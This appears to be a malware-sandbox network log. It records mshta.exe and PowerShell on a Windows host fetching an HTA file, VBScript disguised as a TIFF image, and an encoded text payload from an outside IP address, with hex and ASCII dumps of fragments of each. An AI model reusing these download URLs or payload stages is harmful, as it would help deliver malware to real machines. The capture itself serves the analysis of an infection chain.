                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                    Range: bytes=8896-
                                                                                                    Connection: Keep-Alive
                                                                                                    Host: 198.46.178.155
                                                                                                    If-Range: "20ca3-62596e8602d48"
                                                                                                    Oct 29, 2024 10:12:33.244520903 CET1236INHTTP/1.1 206 Partial Content
                                                                                                    Date: Tue, 29 Oct 2024 09:12:33 GMT
                                                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                    Last-Modified: Tue, 29 Oct 2024 05:32:14 GMT
                                                                                                    ETag: "20ca3-62596e8602d48"
                                                                                                    Accept-Ranges: bytes
                                                                                                    Content-Length: 125411
                                                                                                    Content-Range: bytes 8896-134306/134307
                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                    Connection: Keep-Alive
                                                                                                    Content-Type: application/hta
                                                                                                    Data Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 [TRUNCATED]
                                                                                                    Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25253A%252509%252509%252509%252509%252509%252509%252509%25
                                                                                                    Oct 29, 2024 10:12:33.244571924 CET1236INData Raw: 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25
                                                                                                    Data Ascii: 2509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%
                                                                                                    Oct 29, 2024 10:12:33.244584084 CET1236INData Raw: 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35
                                                                                                    Data Ascii: %252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
                                                                                                    Oct 29, 2024 10:12:33.244628906 CET1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30
                                                                                                    Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                                                                                                    Oct 29, 2024 10:12:33.244642973 CET1236INData Raw: 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35
                                                                                                    Data Ascii: 09%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25
                                                                                                    Oct 29, 2024 10:12:33.244658947 CET1236INData Raw: 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35
                                                                                                    Data Ascii: 09%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25
                                                                                                    Oct 29, 2024 10:12:33.244688034 CET1236INData Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39
                                                                                                    Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509
                                                                                                    Oct 29, 2024 10:12:33.244704008 CET1236INData Raw: 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32
                                                                                                    Data Ascii: 9%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252
                                                                                                    Oct 29, 2024 10:12:33.244716883 CET1236INData Raw: 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25
                                                                                                    Data Ascii: 2509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%
                                                                                                    Oct 29, 2024 10:12:33.244728088 CET460INData Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39
                                                                                                    Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509
                                                                                                    Oct 29, 2024 10:12:33.250220060 CET1236INData Raw: 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35
                                                                                                    Data Ascii: %252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    2192.168.2.2249167198.46.178.155803740C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:12:40.123156071 CET385OUTGET /422/seethebestthingswithgoodthingsforgetmebackwithbestthings.tIF HTTP/1.1
                                                                                                    Accept: */*
                                                                                                    UA-CPU: AMD64
                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                    Host: 198.46.178.155
                                                                                                    Connection: Keep-Alive
                                                                                                    Oct 29, 2024 10:12:40.794254065 CET1236INHTTP/1.1 200 OK
                                                                                                    Date: Tue, 29 Oct 2024 09:12:40 GMT
                                                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                    Last-Modified: Tue, 29 Oct 2024 05:25:01 GMT
                                                                                                    ETag: "22546-62596ce9c1009"
                                                                                                    Accept-Ranges: bytes
                                                                                                    Content-Length: 140614
                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                    Connection: Keep-Alive
                                                                                                    Content-Type: image/tiff
                                                                                                    Data Raw: ff fe 70 00 72 00 69 00 76 00 61 00 74 00 65 00 20 00 66 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 43 00 72 00 65 00 61 00 74 00 65 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 28 00 77 00 73 00 6d 00 61 00 6e 00 2c 00 20 00 63 00 6f 00 6e 00 53 00 74 00 72 00 2c 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2c 00 20 00 6c 00 61 00 62 00 72 00 6f 00 73 00 6f 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 70 00 61 00 6e 00 65 00 74 00 65 00 46 00 6c 00 61 00 67 00 73 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 63 00 6f 00 6e 00 4f 00 70 00 74 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 70 00 61 00 6e 00 65 00 74 00 65 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 61 00 75 00 74 00 68 00 56 00 61 00 6c 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 65 00 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 56 00 61 00 6c 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 65 00 6e 00 63 00 72 00 [TRUNCATED]
                                                                                                    Data Ascii: private function CreateSession(wsman, conStr, optDic, labroso) dim paneteFlags dim conOpt dim panete dim authVal dim encodingVal dim encryptVal dim pw dim tout ' proxy information dim proxyAccessType dim proxyAccessTypeVal dim proxyAuthenticationMechanism dim proxyAuthenticationMechanismVal dim proxyUsername dim proxyPassword paneteFlags = 0 proxyAccessType = 0
                                                                                                    Oct 29, 2024 10:12:40.794287920 CET1236INData Raw: 00 20 00 20 00 70 00 72 00 6f 00 78 00 79 00 41 00 63 00 63 00 65 00 73 00 73 00 54 00 79 00 70 00 65 00 56 00 61 00 6c 00 20 00 3d 00 20 00 30 00 0d 00 0a 00 20 00 20 00 20 00 20 00 70 00 72 00 6f 00 78 00 79 00 41 00 75 00 74 00 68 00 65 00 6e
                                                                                                    Data Ascii: proxyAccessTypeVal = 0 proxyAuthenticationMechanism = 0 proxyAuthenticationMechanismVal = 0 proxyUsernam
                                                                                                    Oct 29, 2024 10:12:40.794305086 CET1236INData Raw: 00 65 00 6e 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 70 00 61 00 6e 00 65 00 74 00 65 00 46 00 6c 00 61 00 67 00 73 00 20 00 3d 00 20 00 70 00 61 00 6e 00 65 00 74 00 65 00 46 00 6c 00 61 00 67 00 73
                                                                                                    Data Ascii: en paneteFlags = paneteFlags OR wsman.SessionFlagUTF8 else ' Invalid! A
                                                                                                    Oct 29, 2024 10:12:40.794349909 CET1236INData Raw: 00 20 00 20 00 20 00 20 00 20 00 41 00 53 00 53 00 45 00 52 00 54 00 42 00 4f 00 4f 00 4c 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 45 00 78 00 69 00 73 00 74 00 73 00 28 00 4e 00 50 00 41
                                                                                                    Data Ascii: ASSERTBOOL optDic.ArgumentExists(NPARA_REMOTE), "The '-" & NPARA_USESSL & "' option is only valid when used with
                                                                                                    Oct 29, 2024 10:12:40.794367075 CET1236INData Raw: 00 27 00 2d 00 61 00 75 00 74 00 68 00 3a 00 6e 00 6f 00 6e 00 65 00 27 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 41 00 53 00 53 00 45 00 52 00 54 00 42 00 4f 00 4f 00 4c
                                                                                                    Data Ascii: '-auth:none'" ASSERTBOOL not optDic.ArgumentExists(NPARA_USERNAME), "The '-" & NPARA_USERNAME & "' optio
                                                                                                    Oct 29, 2024 10:12:40.794382095 CET1236INData Raw: 00 6e 00 6f 00 74 00 20 00 76 00 61 00 6c 00 69 00 64 00 20 00 66 00 6f 00 72 00 20 00 27 00 2d 00 61 00 75 00 74 00 68 00 3a 00 62 00 61 00 73 00 69 00 63 00 27 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20
                                                                                                    Data Ascii: not valid for '-auth:basic'" paneteFlags = paneteFlags OR wsman.SessionFlagCredUsernamePassword OR wsman
                                                                                                    Oct 29, 2024 10:12:40.794397116 CET1236INData Raw: 00 20 00 20 00 20 00 20 00 20 00 20 00 63 00 61 00 73 00 65 00 20 00 56 00 41 00 4c 00 5f 00 4b 00 45 00 52 00 42 00 45 00 52 00 4f 00 53 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20
                                                                                                    Data Ascii: case VAL_KERBEROS '-username and -password are optional. ASSERTBOOL not optDic.
                                                                                                    Oct 29, 2024 10:12:40.794434071 CET36INData Raw: 00 43 00 45 00 52 00 54 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20
                                                                                                    Data Ascii: CERT
                                                                                                    Oct 29, 2024 10:12:40.794447899 CET1236INData Raw: 00 20 00 20 00 20 00 20 00 27 00 2d 00 63 00 65 00 72 00 74 00 69 00 66 00 69 00 63 00 61 00 74 00 65 00 20 00 69 00 73 00 20 00 6d 00 61 00 6e 00 64 00 61 00 74 00 6f 00 72 00 79 00 2e 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20
                                                                                                    Data Ascii: '-certificate is mandatory. ASSERTBOOL optDic.ArgumentExists(NPARA_CERT), "The '-" & NPARA_CERT &
                                                                                                    Oct 29, 2024 10:12:40.794464111 CET1236INData Raw: 00 20 00 20 00 20 00 20 00 20 00 63 00 61 00 73 00 65 00 20 00 56 00 41 00 4c 00 5f 00 43 00 52 00 45 00 44 00 53 00 53 00 50 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 27 00 55
                                                                                                    Data Ascii: case VAL_CREDSSP 'Use -username and -password. ASSERTBOOL osVersion >= osVista,
                                                                                                    Oct 29, 2024 10:12:40.799967051 CET1236INData Raw: 00 73 00 65 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 41 00 53 00 53 00 45 00 52 00 54 00 42 00 4f 00 4f 00 4c 00 20 00 66 00 61 00 6c 00 73 00 65 00 2c 00 20 00 22 00 54
                                                                                                    Data Ascii: se ASSERTBOOL false, "The specified '-" & NPARA_AUTH & "' flag '" & authVal & "' has an invalid value."


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    3192.168.2.2249174198.46.178.155802112C:\Windows\System32\mshta.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:12:51.305886030 CET500OUTGET /422/sw/nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.hta HTTP/1.1
                                                                                                    Accept: */*
                                                                                                    Accept-Language: fr-FR
                                                                                                    UA-CPU: AMD64
                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                    If-Modified-Since: Tue, 29 Oct 2024 05:32:14 GMT
                                                                                                    Connection: Keep-Alive
                                                                                                    Host: 198.46.178.155
                                                                                                    If-None-Match: "20ca3-62596e8602d48"
                                                                                                    Oct 29, 2024 10:12:51.989428043 CET275INHTTP/1.1 304 Not Modified
                                                                                                    Date: Tue, 29 Oct 2024 09:12:51 GMT
                                                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                    Last-Modified: Tue, 29 Oct 2024 05:32:14 GMT
                                                                                                    ETag: "20ca3-62596e8602d48"
                                                                                                    Accept-Ranges: bytes
                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                    Connection: Keep-Alive


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    4192.168.2.2249177198.46.178.155803860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:13:25.060331106 CET80OUTGET /422/SMPRGSSR.txt HTTP/1.1
                                                                                                    Host: 198.46.178.155
                                                                                                    Connection: Keep-Alive
                                                                                                    Oct 29, 2024 10:13:25.731982946 CET1236INHTTP/1.1 200 OK
                                                                                                    Date: Tue, 29 Oct 2024 09:13:25 GMT
                                                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                    Last-Modified: Tue, 29 Oct 2024 05:21:00 GMT
                                                                                                    ETag: "22aac-62596c032d075"
                                                                                                    Accept-Ranges: bytes
                                                                                                    Content-Length: 141996
                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                    Connection: Keep-Alive
                                                                                                    Content-Type: text/plain
                                                                                                    Data Raw: 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                                                                                                    Data Ascii: =AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                    Oct 29, 2024 10:13:25.732027054 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                    Oct 29, 2024 10:13:25.732038975 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                    Oct 29, 2024 10:13:25.732053041 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                    Oct 29, 2024 10:13:25.732064009 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                    Oct 29, 2024 10:13:25.732075930 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                    Oct 29, 2024 10:13:25.732088089 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                    Oct 29, 2024 10:13:25.732103109 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
